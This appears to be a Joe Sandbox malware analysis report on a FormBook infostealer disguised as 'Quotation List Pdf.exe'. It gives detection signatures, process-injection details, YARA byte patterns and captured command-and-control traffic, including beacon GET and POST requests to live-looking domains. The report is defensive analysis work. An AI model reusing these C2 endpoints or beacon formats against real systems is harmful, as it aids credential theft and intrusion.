Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Quotation List Pdf.exe

Overview

General Information

Sample name:Quotation List Pdf.exe
Analysis ID:1465353
MD5:9cfd62fc26438eeb8a50922265ad0ea7
SHA1:6bf1e9ab8b0d0c486b85649cf3bc8c1db4b21b01
SHA256:7eaa347573db3f24316a9ab2d30256db4d35105c7d93f9dbf8d860ec99949280
Tags:exe
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
Yara detected FormBook
AI detected suspicious sample
Allocates memory in foreign processes
Found direct / indirect Syscall (likely to bypass EDR)
Initial sample is a PE file and has a suspicious name
Injects a PE file into a foreign processes
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses ping.exe to check the status of other devices and networks
Uses regedit.exe to modify the Windows registry
Writes to foreign memory regions
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain (date check)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Uncommon Svchost Parent Process
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • Quotation List Pdf.exe (PID: 3020 cmdline: "C:\Users\user\Desktop\Quotation List Pdf.exe" MD5: 9CFD62FC26438EEB8A50922265AD0EA7)
    • conhost.exe (PID: 6220 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • svchost.exe (PID: 3688 cmdline: "C:\Windows\System32\svchost.exe" MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
    • regedit.exe (PID: 7008 cmdline: "C:\Windows\regedit.exe" MD5: 999A30979F6195BF562068639FFC4426)
    • vbc.exe (PID: 6852 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe" MD5: 0A7608DB01CAE07792CEA95E792AA866)
      • tiwTBKVufjvhPL.exe (PID: 6260 cmdline: "C:\Program Files (x86)\imKjXZcdkPvaNBmohymPyGBpYqHlJGFXfRwQSYwktKdQathTVR\tiwTBKVufjvhPL.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • PING.EXE (PID: 1160 cmdline: "C:\Windows\SysWOW64\PING.EXE" MD5: B3624DD758CCECF93A1226CEF252CA12)
          • tiwTBKVufjvhPL.exe (PID: 5992 cmdline: "C:\Program Files (x86)\imKjXZcdkPvaNBmohymPyGBpYqHlJGFXfRwQSYwktKdQathTVR\tiwTBKVufjvhPL.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 4788 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000005.00000002.1557293648.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    00000005.00000002.1557293648.0000000000400000.00000040.00000400.00020000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
    • 0x2de83:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
    • 0x173e2:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
    00000007.00000002.3299718726.0000000003450000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000007.00000002.3299718726.0000000003450000.00000004.00000800.00020000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
      • 0x2ab60:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
      • 0x140bf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
      00000006.00000002.3299760610.00000000043B0000.00000040.00000001.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        Click to see the 11 entries

        Unpacked PEs

        SourceRuleDescriptionAuthorStrings
        5.2.vbc.exe.400000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          5.2.vbc.exe.400000.0.unpackWindows_Trojan_Formbook_1112e116unknownunknown
          • 0x2d083:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
          • 0x165e2:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
          5.2.vbc.exe.400000.0.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
            5.2.vbc.exe.400000.0.raw.unpackWindows_Trojan_Formbook_1112e116unknownunknown
            • 0x2de83:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
            • 0x173e2:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01

            Sigma Signatures

            System Summary

            barindex
            Sigma detected: Uncommon Svchost Parent Process
            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\svchost.exe", CommandLine: "C:\Windows\System32\svchost.exe", CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\Quotation List Pdf.exe", ParentImage: C:\Users\user\Desktop\Quotation List Pdf.exe, ParentProcessId: 3020, ParentProcessName: Quotation List Pdf.exe, ProcessCommandLine: "C:\Windows\System32\svchost.exe", ProcessId: 3688, ProcessName: svchost.exe
            Sigma detected: Windows Processes Suspicious Parent Directory
            Source: Process startedAuthor: vburov: Data: Command: "C:\Windows\System32\svchost.exe", CommandLine: "C:\Windows\System32\svchost.exe", CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\Quotation List Pdf.exe", ParentImage: C:\Users\user\Desktop\Quotation List Pdf.exe, ParentProcessId: 3020, ParentProcessName: Quotation List Pdf.exe, ProcessCommandLine: "C:\Windows\System32\svchost.exe", ProcessId: 3688, ProcessName: svchost.exe

            Snort Signatures

            Timestamp:07/01/24-15:45:01.553785
            SID:2856318
            Source Port:49713
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected

            Joe Sandbox Signatures

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Multi AV Scanner detection for submitted file
            Source: Quotation List Pdf.exeReversingLabs: Detection: 47%
            Yara detected FormBook
            Source: Yara matchFile source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 5.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000005.00000002.1557293648.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.3299718726.0000000003450000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.3299760610.00000000043B0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.3299617930.0000000003410000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.1557934690.0000000007A30000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.3297787952.0000000003080000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.1557553662.0000000005780000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000002.3302954162.0000000005210000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            AI detected suspicious sample
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
            Source: Quotation List Pdf.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
            Source: Binary string: Unexpected node type! Please add aupport for any new parse tree nodes to the AutoParseTreeVisitor class!VB$AnonymousDelegateVB$StateMachinemscorpe.dllCreateICeeFileGenCreateICeeFileGenDestroyICeeFileGenDestroyICeeFileGen%ld.Myalink.dllCreateALinkCreateALinkComImport_VtblGap As Integer.pdbCLSID_CorSymWriter&%s.sdatavector<T> too longS?~ source: PING.EXE, 00000007.00000002.3302803643.00000000040DC000.00000004.10000000.00040000.00000000.sdmp, PING.EXE, 00000007.00000002.3301719509.0000000003B6E000.00000004.00000020.00020000.00000000.sdmp, tiwTBKVufjvhPL.exe, 00000009.00000000.1624939934.0000000002DDC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000B.00000002.1846037806.0000000022D1C000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: tiwTBKVufjvhPL.exe, 00000006.00000002.3297786595.00000000000FE000.00000002.00000001.01000000.00000004.sdmp, tiwTBKVufjvhPL.exe, 00000009.00000000.1624296324.00000000000FE000.00000002.00000001.01000000.00000004.sdmp
            Source: Binary string: wntdll.pdbUGP source: vbc.exe, 00000005.00000002.1557586144.00000000057E0000.00000040.00001000.00020000.00000000.sdmp, PING.EXE, 00000007.00000002.3300263133.00000000039AE000.00000040.00001000.00020000.00000000.sdmp, PING.EXE, 00000007.00000003.1557633675.00000000034BE000.00000004.00000020.00020000.00000000.sdmp, PING.EXE, 00000007.00000003.1559396373.0000000003668000.00000004.00000020.00020000.00000000.sdmp, PING.EXE, 00000007.00000002.3300263133.0000000003810000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: vbc.exe, vbc.exe, 00000005.00000002.1557586144.00000000057E0000.00000040.00001000.00020000.00000000.sdmp, PING.EXE, PING.EXE, 00000007.00000002.3300263133.00000000039AE000.00000040.00001000.00020000.00000000.sdmp, PING.EXE, 00000007.00000003.1557633675.00000000034BE000.00000004.00000020.00020000.00000000.sdmp, PING.EXE, 00000007.00000003.1559396373.0000000003668000.00000004.00000020.00020000.00000000.sdmp, PING.EXE, 00000007.00000002.3300263133.0000000003810000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: ping.pdbGCTL source: vbc.exe, 00000005.00000002.1557401565.00000000052B8000.00000004.00000020.00020000.00000000.sdmp, tiwTBKVufjvhPL.exe, 00000006.00000002.3299029778.0000000000788000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: vbc.pdb source: PING.EXE, 00000007.00000002.3302803643.00000000040DC000.00000004.10000000.00040000.00000000.sdmp, PING.EXE, 00000007.00000002.3301719509.0000000003B6E000.00000004.00000020.00020000.00000000.sdmp, tiwTBKVufjvhPL.exe, 00000009.00000000.1624939934.0000000002DDC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000B.00000002.1846037806.0000000022D1C000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: ping.pdb source: vbc.exe, 00000005.00000002.1557401565.00000000052B8000.00000004.00000020.00020000.00000000.sdmp, tiwTBKVufjvhPL.exe, 00000006.00000002.3299029778.0000000000788000.00000004.00000020.00020000.00000000.sdmp
            Source: C:\Windows\SysWOW64\PING.EXECode function: 7_2_0309BE10 FindFirstFileW,FindNextFileW,FindClose,7_2_0309BE10
            Source: C:\Users\user\Desktop\Quotation List Pdf.exeCode function: 4x nop then push rbx0_2_00007FF768431C50
            Source: C:\Users\user\Desktop\Quotation List Pdf.exeCode function: 4x nop then push rbx0_2_00007FF768431C50
            Source: C:\Users\user\Desktop\Quotation List Pdf.exeCode function: 4x nop then push rbx0_2_00007FF7684BDD30
            Source: C:\Users\user\Desktop\Quotation List Pdf.exeCode function: 4x nop then sub rsp, 28h0_2_00007FF7684BDD30
            Source: C:\Users\user\Desktop\Quotation List Pdf.exeCode function: 4x nop then push rbx0_2_00007FF7684BDD30
            Source: C:\Users\user\Desktop\Quotation List Pdf.exeCode function: 4x nop then push rbx0_2_00007FF7684BDD30
            Source: C:\Users\user\Desktop\Quotation List Pdf.exeCode function: 4x nop then push rbx0_2_00007FF7684BDD30
            Source: C:\Users\user\Desktop\Quotation List Pdf.exeCode function: 4x nop then push rbx0_2_00007FF7684BDD30
            Source: C:\Users\user\Desktop\Quotation List Pdf.exeCode function: 4x nop then push rbx0_2_00007FF7684BDD30
            Source: C:\Users\user\Desktop\Quotation List Pdf.exeCode function: 4x nop then sub rsp, 28h0_2_00007FF7684BDD30
            Source: C:\Users\user\Desktop\Quotation List Pdf.exeCode function: 4x nop then push rsi0_2_00007FF7684BDD30
            Source: C:\Users\user\Desktop\Quotation List Pdf.exeCode function: 4x nop then push rdi0_2_00007FF7684BDD30
            Source: C:\Users\user\Desktop\Quotation List Pdf.exeCode function: 4x nop then push rdi0_2_00007FF7684F3D20
            Source: C:\Users\user\Desktop\Quotation List Pdf.exeCode function: 4x nop then push r140_2_00007FF76856D7E0
            Source: C:\Windows\SysWOW64\PING.EXECode function: 4x nop then xor eax, eax7_2_030896A0
            Source: C:\Windows\SysWOW64\PING.EXECode function: 4x nop then mov ebx, 00000004h7_2_03660542

            Networking

            barindex
            Snort IDS alert for network traffic
            Source: TrafficSnort IDS: 2856318 ETPRO TROJAN FormBook CnC Checkin (POST) M4 192.168.2.8:49713 -> 3.33.244.179:80
            Performs DNS queries to domains with low reputation
            Source: DNS query: www.ngkwnq.xyz
            Source: DNS query: www.ajjmamlllqqq.xyz
            Uses ping.exe to check the status of other devices and networks
            Source: C:\Program Files (x86)\imKjXZcdkPvaNBmohymPyGBpYqHlJGFXfRwQSYwktKdQathTVR\tiwTBKVufjvhPL.exeProcess created: C:\Windows\SysWOW64\PING.EXE "C:\Windows\SysWOW64\PING.EXE"
            Source: Joe Sandbox ViewIP Address: 188.114.97.3 188.114.97.3
            Source: Joe Sandbox ViewIP Address: 188.114.97.3 188.114.97.3
            Source: Joe Sandbox ViewIP Address: 76.223.105.230 76.223.105.230
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: global trafficHTTP traffic detected: GET /z6sg/?hv=zih0DoxsYMMKz8ZABxgT1WFK2McCJpyMbPq/OME2Y84w2Vm66kFudiKZ8IXY1l1UIMuRoxNGX/afyyUEkrlqrKni6t8ICyCnTx8av+sD3Gyos8WHaN8U0OpOBqhAw2rkZw==&Sbzdb=DvgXWdN HTTP/1.1Accept: */*Accept-Language: en-USHost: www.evoolihubs.shopConnection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:37.0) Gecko/20100101 Firefox/37.0
            Source: global trafficHTTP traffic detected: GET /4xhu/?hv=kUigRkBAqBt1RQ4PHNukF4xZPToH+1QI6otQDXJCvCY9YbUgfI2Re+iS8c4dlot+geZi3vfTzLYXZH9sWq6jT8j+eYYKaAUwNfi+eLrrbumEku+3ygxonLPUoh3L9hGJlw==&Sbzdb=DvgXWdN HTTP/1.1Accept: */*Accept-Language: en-USHost: www.mycaringfriend.onlineConnection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:37.0) Gecko/20100101 Firefox/37.0
            Source: global trafficHTTP traffic detected: GET /o2rg/?hv=HosprsjiipEFZkdlXtfyIs2HS8VP0Lx1JctxEV0LpDy1TX4kdcFD2HTZ1ZNwt0d2CmaO7pR5URztAlcHvOxdSj57tnDbyp24LsG2z7IhVzqV3j0gtM8YC4wacEpxZhptTA==&Sbzdb=DvgXWdN HTTP/1.1Accept: */*Accept-Language: en-USHost: www.marttyes.topConnection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:37.0) Gecko/20100101 Firefox/37.0
            Source: global trafficHTTP traffic detected: GET /v1kj/?hv=doj+6iUDZydJqFVnCXjkp3F4RUW5KXgrYHqPdL8oMaa0q7VqYsyQxdbUVD3Fk32bJgHvLY4KB1BicN6WuEPq/9BNjeLnpFWO+QoiBFVxHjC/ELqB/38Ky5muYdCtwXhrYw==&Sbzdb=DvgXWdN HTTP/1.1Accept: */*Accept-Language: en-USHost: www.sponsoraveteran.infoConnection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:37.0) Gecko/20100101 Firefox/37.0
            Source: global trafficHTTP traffic detected: GET /e5ni/?hv=5igWVKYME1F2HJuEqzDD4BytRWNfFWn6ld9EO0nuwIC7ejuHGgZWNZHr69K3UvIzgGWBTOng6QRLO5bRM99dWtUQcUECcC3CaxVjbCwQta3fR2FUS95NK5IjfJQajbbRQA==&Sbzdb=DvgXWdN HTTP/1.1Accept: */*Accept-Language: en-USHost: www.yvw66.topConnection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:37.0) Gecko/20100101 Firefox/37.0
            Source: global trafficHTTP traffic detected: GET /vapn/?hv=zIQCtJPr8f6IEHIEo3TNC67HH9mmSCxic5WS7/A3sw1OteiabhN4nVuyPRk+K2L+MLR9kC9TPTQdF4ehIT0bCTCmTt1bteoRMu1plsZV53w6ucKr+pMiAUHXVfrsn+3QcA==&Sbzdb=DvgXWdN HTTP/1.1Accept: */*Accept-Language: en-USHost: www.fundraiserstuffies.comConnection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:37.0) Gecko/20100101 Firefox/37.0
            Source: global trafficHTTP traffic detected: GET /8lwi/?hv=VRq/gdJR4rGg5JPfAG5ylFJXonLci7il5oNXQSZCeVYj1ovZxvPBP2fSASRs9V/B8emNhLugTvQrnEJ4A2g8ywXJhi2TGyyLJT3xrxwpBdhnsBD5VEgEmoQil+34l9QVbw==&Sbzdb=DvgXWdN HTTP/1.1Accept: */*Accept-Language: en-USHost: www.aquamotricidad.comConnection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:37.0) Gecko/20100101 Firefox/37.0
            Source: global trafficHTTP traffic detected: GET /fuua/?hv=3fNRerFIk63V1+IMAu4qlsMdt7YNs0EnlFsxF2g0jvBo5aDcf8mM3XhGrDpzzYUjwL0bjZmkMy0lhAUZIEhvtJpfy2aMBt81fLEje/cDaztKC30TKJAPkx8cZzQFh5/qVA==&Sbzdb=DvgXWdN HTTP/1.1Accept: */*Accept-Language: en-USHost: www.te74y.topConnection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:37.0) Gecko/20100101 Firefox/37.0
            Source: global trafficHTTP traffic detected: GET /44zl/?hv=cT3mCg7Cmib/+TsqKgcGcLNa3rN7XS3dP4LITboVuuCqI7qZSFFYJV7Jt59+pqQMU8QRjoSmjIZC25OqP8KY8gmteTpLVZlDreUlLLyNnWL1wa1Nczp2K6xKprp1RRbIsA==&Sbzdb=DvgXWdN HTTP/1.1Accept: */*Accept-Language: en-USHost: www.ngkwnq.xyzConnection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:37.0) Gecko/20100101 Firefox/37.0
            Source: global trafficHTTP traffic detected: GET /jtz4/?hv=r1qQkpPieaVsNUG68+02NppS6IukHQ6wFXr4oQU+uO/CVftnLbVi7u9JfCXfhwamzeJuyCR7X8qwC2gN3XV8echUBAJmUx7G1CfEdwxlKk1EGrOsAByXTICV/hREjOoViQ==&Sbzdb=DvgXWdN HTTP/1.1Accept: */*Accept-Language: en-USHost: www.eoghenluire.comConnection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:37.0) Gecko/20100101 Firefox/37.0
            Source: global trafficHTTP traffic detected: GET /17ef/?hv=BkwgEDM72plk1SoNdv8pOFX/Y0L1Y0wMy+4dvxwo/Oj/80wh3Wvb7+zqtjdXyImQl2Jnvy48BKhjFvscwh0k3TFr3WzonWtP3CiK72Em1Tp7LQVto/HSEXKZGZ++Ap7pGg==&Sbzdb=DvgXWdN HTTP/1.1Accept: */*Accept-Language: en-USHost: www.poodlemum.comConnection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:37.0) Gecko/20100101 Firefox/37.0
            Source: global trafficHTTP traffic detected: GET /5lw2/?hv=iESIo6eVsdqcOmRYuFlUcr07YKkPV6iF6CPlu5h9EhLBhYFmo+CVfgok2cyX/3C89hOXIPK4L028RRlOYTTbn0S9j8UWgSdZAw9+mXeQ1LVvSh67jDUK/iIxNMtsobgO7w==&Sbzdb=DvgXWdN HTTP/1.1Accept: */*Accept-Language: en-USHost: www.ajjmamlllqqq.xyzConnection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:37.0) Gecko/20100101 Firefox/37.0
            Source: global trafficDNS traffic detected: DNS query: www.evoolihubs.shop
            Source: global trafficDNS traffic detected: DNS query: www.mycaringfriend.online
            Source: global trafficDNS traffic detected: DNS query: www.marttyes.top
            Source: global trafficDNS traffic detected: DNS query: www.sponsoraveteran.info
            Source: global trafficDNS traffic detected: DNS query: www.yvw66.top
            Source: global trafficDNS traffic detected: DNS query: www.fundraiserstuffies.com
            Source: global trafficDNS traffic detected: DNS query: www.aquamotricidad.com
            Source: global trafficDNS traffic detected: DNS query: www.te74y.top
            Source: global trafficDNS traffic detected: DNS query: www.ngkwnq.xyz
            Source: global trafficDNS traffic detected: DNS query: www.eoghenluire.com
            Source: global trafficDNS traffic detected: DNS query: www.poodlemum.com
            Source: global trafficDNS traffic detected: DNS query: www.ajjmamlllqqq.xyz
            Source: unknownHTTP traffic detected: POST /4xhu/ HTTP/1.1Accept: */*Accept-Language: en-USAccept-Encoding: gzip, deflate, brHost: www.mycaringfriend.onlineOrigin: http://www.mycaringfriend.onlineContent-Type: application/x-www-form-urlencodedCache-Control: max-age=0Content-Length: 203Connection: closeReferer: http://www.mycaringfriend.online/4xhu/User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:37.0) Gecko/20100101 Firefox/37.0Data Raw: 68 76 3d 70 57 4b 41 53 51 42 48 6b 47 35 58 51 42 45 6e 49 39 75 6a 42 75 56 4e 58 53 6b 63 67 53 6b 62 39 6f 31 4c 4d 68 42 54 79 32 30 6f 55 66 35 31 59 37 65 56 56 66 32 59 34 37 67 7a 74 73 38 48 70 75 45 62 75 2f 66 64 39 39 63 42 53 67 78 37 5a 65 6d 52 5a 4d 66 66 63 4a 77 6b 57 32 51 61 4e 73 61 38 66 71 33 4a 46 35 48 38 78 70 4b 56 78 43 51 58 37 71 6d 44 6b 51 66 71 78 54 50 42 37 30 4d 57 2f 6b 38 73 51 66 63 45 2f 51 5a 74 73 32 61 2f 39 49 31 54 37 6a 79 49 44 37 38 67 6e 76 50 34 34 58 35 64 74 6e 4b 55 57 78 6a 52 77 61 78 43 4b 37 56 35 53 66 73 65 34 5a 79 79 69 4e 64 62 6b 63 45 3d Data Ascii: hv=pWKASQBHkG5XQBEnI9ujBuVNXSkcgSkb9o1LMhBTy20oUf51Y7eVVf2Y47gzts8HpuEbu/fd99cBSgx7ZemRZMffcJwkW2QaNsa8fq3JF5H8xpKVxCQX7qmDkQfqxTPB70MW/k8sQfcE/QZts2a/9I1T7jyID78gnvP44X5dtnKUWxjRwaxCK7V5Sfse4ZyyiNdbkcE=
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 01 Jul 2024 13:45:16 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 01 Jul 2024 13:45:18 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta 